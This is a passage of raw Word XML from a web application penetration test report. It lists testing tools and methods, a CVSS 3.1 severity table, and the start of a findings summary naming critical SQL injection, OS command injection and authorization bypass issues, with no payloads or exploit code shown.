    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="6A5E15F5" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Burp Suite Professional — Intercepting proxy and web application scanner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="7477A6D4" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Manual SQL Injection testing with crafted payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="43020521" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>OS command injection using chained shell operators</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="3D58E5B7" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>OWASP Testing Guide v4 as testing reference</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="4101652C" w14:textId="77777777">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="0FDF1B4C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading10"/>
        <w:shd w:val="clear" w:color="auto" w:fill="1A2B4A"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:t>3. Risk Rating Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="4B99056E" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="356A7C40" w14:paraId="5446D27A" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r w:rsidRPr="356A7C40">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>All vulnerabilities identified during this assessment have been rated using the Common Vulnerability Scoring System (CVSS) version 3.1. CVSS provides a standardized framework for communicating the characteristics and severity of software vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="1299C43A" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="75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3960"/>
      </w:tblGrid>
      <w:tr w:rsidR="00966105" w:rsidTr="485EA61B" w14:paraId="127E00E7" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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1E75B446" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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0243A4D6" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="39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3DA1D686" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="485EA61B" w14:paraId="7F79B139" w14:textId="77777777">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C0392B"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="48E9AF7A" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</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00191B85" w14:paraId="5A82A798" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.0 - 10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="39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1CD77F7D" w14:paraId="487E69BD" w14:textId="00B0B5BA">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Immediate action </w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B" w:rsidR="595BF9CD">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>is required</w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>. Represents the highest risk to the organization.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="485EA61B" w14:paraId="7848461F" w14:textId="77777777">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E67E22"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="7E177962" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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966105" w:rsidRDefault="00191B85" w14:paraId="6EF8C30F" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.0 - 8.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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966105" w:rsidRDefault="00191B85" w14:paraId="5883F08A" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Urgent remediation. Significant risk that could lead to data compromise.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="485EA61B" w14:paraId="6E567FF9" w14:textId="77777777">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D4AC0D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="19497B9C" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</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00191B85" w14:paraId="40CD07AF" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4.0 - 6.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="39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1CD77F7D" w14:paraId="44897EC2" w14:textId="1710ED98">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Timely remediation. Moderate </w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B" w:rsidR="6A1F5140">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>risk</w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> should be addressed in the near term.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="485EA61B" w14:paraId="29996D95" w14:textId="77777777">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27AE60"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="1E16C85B" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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966105" w:rsidRDefault="00191B85" w14:paraId="712E0509" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>0.1 - 3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="39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0966105" w:rsidRDefault="356A7C40" w14:paraId="4602D788" w14:textId="77777777">
            <w:r w:rsidRPr="356A7C40">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low risk. Should be addressed as part of routine maintenance cycles.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="485EA61B" w14:paraId="68A538BC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="2980B9"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="600A6140" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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00191B85" w14:paraId="629D792A" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="39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tcPr>
          <w:p w:rsidR="00966105" w:rsidRDefault="1CD77F7D" w14:paraId="6036BDAA" w14:textId="195AE62B">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">No direct risk, but best practices or awareness items </w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B" w:rsidR="3221A9D7">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>are noted</w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="4DDBEF00" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="1E0584FA" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Findings are also mapped to the OWASP Top 10 (2021) to contextualize the vulnerability class and provide alignment with widely accepted web application security standards.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="3461D779" w14:textId="77777777">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="4EC95606" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading10"/>
        <w:shd w:val="clear" w:color="auto" w:fill="1A2B4A"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:t>4. Findings Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="3CF2D8B6" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="356A7C40" w14:paraId="573C064C" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r w:rsidRPr="356A7C40">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>The table below provides a consolidated overview of all security findings identified during this assessment. Each finding is assigned a unique ID, mapped to an OWASP category, rated by severity, and given a CVSS score.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="0FB78278" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="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877"/>
        <w:gridCol w:w="3449"/>
        <w:gridCol w:w="1473"/>
        <w:gridCol w:w="1187"/>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="1240"/>
      </w:tblGrid>
      <w:tr w:rsidR="00966105" w:rsidTr="03E66DE5" w14:paraId="31F54484" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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0A970367" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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15FC2325" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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1E5A74F1" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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656AD2B7" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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26B7F7BD" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="100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1B9FBFDD" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="03E66DE5" w14:paraId="7E3B881D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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019C519" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2E5FA3"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>F-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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37C1A50" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Boolean-Based Blind SQL Injection allowing unauthorized database enumeration</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CFA19F7" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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706D0A6" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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7440892" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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0A03529" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="03E66DE5" w14:paraId="06A6856C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="87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68D551D6" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2E5FA3"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>F-002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3449"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591E26A2" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SQL Injection allowing unauthorized database data extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473"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50716D76" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="118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2476DB1D" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134"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28C52BC5" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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3647328C" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="03E66DE5" w14:paraId="5E5FA459" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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DD73BE0" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2E5FA3"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>F-003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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B2B40E4" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OS Command Injection allowing arbitrary command execution on the host server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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46B8D50" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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37E0D97E" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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3211EFED" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="100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7A27B28" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="03E66DE5" w14:paraId="5830251F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="87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23969BC8" w14:textId="0B6A2097">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2E5FA3"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>F-00</w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B" w:rsidR="43C50519">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2E5FA3"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3449"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3C50519" w:rsidP="485EA61B" w:rsidRDefault="43C50519" w14:paraId="3A755B73" w14:textId="18ED3C54">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Authorization Bypass allowing unauthorized privileged access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473"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216E4E1" w:rsidP="485EA61B" w:rsidRDefault="0216E4E1" w14:paraId="140CCC4B" w14:textId="73D77BBD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
